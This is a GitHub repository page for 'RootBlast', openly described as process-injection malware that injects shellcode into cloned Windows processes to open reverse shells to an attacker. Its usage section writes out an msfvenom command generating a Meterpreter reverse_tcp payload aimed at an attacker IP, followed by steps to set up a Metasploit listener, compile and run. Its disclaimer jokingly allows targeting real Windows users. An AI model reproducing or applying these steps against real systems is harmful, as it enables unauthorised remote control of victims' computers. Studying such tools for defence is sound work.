Skip to content

Spirizeon/rootblast

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 

Repository files navigation

RootBlast 🪴 💥

image

Process injection malware that clones windows processes, injects them with shellcode and executes them to attempt numerous reverse shells on the attacker. (Made with 🤎 for Windows users)

This is only for educational and research purposes (except if your target are windows users)

Usage

  • Clone the repo
git clone https://github.com/spirizeon/rootblast
  • Generate shellcode through msfvenom
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP adress> LPORT=443 -f c --var-name=shellcode
  • Replace shellcode with that in exploit.c

  • Start the listener on the Attacker machine (Run msfconsole as sudo)

image

  • Compile the code (MSVC compiler recommended) and execute

image

Tech Stack

Attacker Kali Linux/ParrotOS VMs, metasploit-framework

Target: Windows 7/10/11 (with Windows defender turned off), Visual C++, C

About

💥 process injection malware written in C using windows API

Resources

Stars

Watchers

Forks

Languages